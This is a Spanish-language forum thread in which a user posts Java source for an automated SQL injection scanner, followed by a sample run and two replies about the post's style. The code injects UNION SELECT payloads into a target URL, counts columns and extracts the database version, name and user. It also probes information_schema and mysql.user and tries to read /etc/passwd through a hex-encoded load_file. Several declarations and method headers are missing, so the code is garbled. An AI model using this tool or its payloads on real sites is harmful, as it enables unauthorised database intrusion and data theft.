Título: [Java] SQL Scanner 0.1
Publicado por: BigBear en 13 Enero 2013, 03:40 am
Un simple Scanner SQLI hecho en Java. //SQL Scanner 0.1 //Coded By Doddy H import java.util.Scanner; import java.io.*; import java.net.*; import java.util.regex.Matcher; import java.util.regex.Pattern; public class Main { Pattern uno = null; Matcher dos = null; Scanner host = new Scanner (System. in); System. out. println("\n\n-- == SQL Scanner 0.1 == --\n\n"); System. out. println("[+] Page : "); target = host.nextLine(); System. out. println("\n[+] Checking ...\n"); codex = toma(target + "-1+union+select+666--"); uno = Pattern.compile("The used SELECT statements have a different number of columns"); dos = uno.matcher(codex); if (dos.find()) { System. out. println("[+] Scanning ...\n"); int x; urlfinal = ""; formariny = ""; for (x = 1; x <= 5; x = x + 1) { //urlfinal = urlfinal+x+","; urlfinal = urlfinal + encodehex("RATSXPDOWN" + x) + ","; formariny = formariny + x + ","; otrofinal = urlfinal; otroformar = formariny; otrofinal = otrofinal.substring(0, otrofinal.length() - 1); otroformar = otroformar.substring(0, otroformar.length() - 1); code = toma(target + "-1+union+select+" + otrofinal); uno = Pattern.compile("RATSXPDOWN(\\d+)"); dos = uno.matcher(code); if (dos.find()) { otroformar = otroformar.replace(dos.group(1), "hackman"); link = target + "-1+union+select+" + otroformar; System. out. println("[Target] : " + link ); System. out. println("[Limit] : The site has " + x + " columns"); System. out. println("[Data] : The number " + dos. group(1) + " print data"); savefile("logs-scansql.txt", "[Target] : " + link); savefile("logs-scansql.txt", "[Limit] : The site has " + x + " columns"); savefile("logs-scansql.txt", "[Data] : The number " + dos.group(1) + " print data"); System. out. println("\n[+] Searching informaion ...\n"); details(link); System. out. println("\n[+] Finished"); System. out. println("\n-- == Coded By Doddy H == --"); savefile("logs-scansql.txt", "\n-----------------\n"); } } System. out. println("[-] Error"); } else { System. out. println("[-] Not vulnerable"); } } Pattern uno = null; Matcher dos = null; concat = "concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))"; urla = urla.replace("hackman", concat); code = toma(urla); uno = Pattern.compile("ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] DB Version : " + dos. group(1)); System. out. println("[+] DB Name : " + dos. group(2)); System. out. println("[+] Username : " + dos. group(3)); savefile("logs-scansql.txt", "[+] DB Version : " + dos.group(1)); savefile("logs-scansql.txt", "[+] DB Name : " + dos.group(2)); savefile("logs-scansql.txt", "[+] Username : " + dos.group(3)); } else { System. out. println("[-] Not found any data"); } urla = urla.replace(concat, "char(69,82,84,79,82,56,53,52)"); code = toma(urla + "+from+information_schema.tables--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] information_schema : on"); savefile("logs-scansql.txt", "[+] information_schema : on"); } else { System. out. println("[-] information_schema : off"); } code = toma(urla + "+from+mysql.user--"); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[+] mysqluser : on"); savefile("logs-scansql.txt", "[+] mysqluser : on"); } else { System. out. println("[-] mysquser : off"); } urla = urla.replace("char(69,82,84,79,82,56,53,52)", "concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))"); //ystem.out.print(urla); code = toma(urla); uno = Pattern.compile("ERTOR854"); dos = uno.matcher(code); if (dos.find()) { System. out. println("[-] load_file : on"); savefile("logs-scansql.txt", "[-] load_file : on"); } else { System. out. println("[-] load_file : off"); } } writer.write(texto + "\r\n"); writer.close(); } hc.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); while ((re = nave.readLine()) != null) { conte.append(re); } nave.close(); return conte.toString(); } //Thanks to Katarina Majetic //Based on http://www.dzone.com/snippets/encode-string-hex byte[] z = text.getBytes(); int n; int a = z.length; int u; for (n = 0; n < a; n++) { u = z[n] & 0x000000FF; h.append(l); } return "0x" + h.toString(); } } //The End ?
Ejemplo de uso -- == SQL Scanner 0.1 == --
[+] Page : http://localhost/sql.php?id=
[+] Checking ...
[+] Scanning ...
[Target] : http://localhost/sql.php?id=-1+union+select+hackman,2,3 [Limit] : The site has 3 columns [Data] : The number 1 print data
[+] Searching informaion ...
[+] DB Version : 5.5.20-log [+] DB Name : hackman [+] Username : root@localhost [+] information_schema : on [+] mysqluser : on [-] load_file : off
[+] Finished
-- == Coded By Doddy H == --
Título: Re: [Java] SQL Scanner 0.1
Publicado por: sapito169 en 13 Enero 2013, 20:01 pm
muchas gracias y felicitaciones por tu aporte hay cosas que muestras que no conozco a profundidad y quisiera conocer mejor
pero hay otras cosas que son muy incomodas
La primera es que publicaste el mismo post varias veces
La segunda es que solo te limitaste a publicar a poner el código lo cual es molesto por que es difícil que estas haciendo y porque seria mejor que pongas un poco mas de texto explicando que haces y dando una pequeña introducción teórica o aun-quesea explicando que hace el código y porque
Título: Re: [Java] SQL Scanner 0.1
Publicado por: BigBear en 13 Enero 2013, 21:34 pm
si , me gusta hacer traducciones , hago el mismo programa en todos los lenguajes que conozco , eso si , el proximo codigo que publique le agrego un ejemplo de uso.
pd : le agregue el ejemplo de uso al post.
|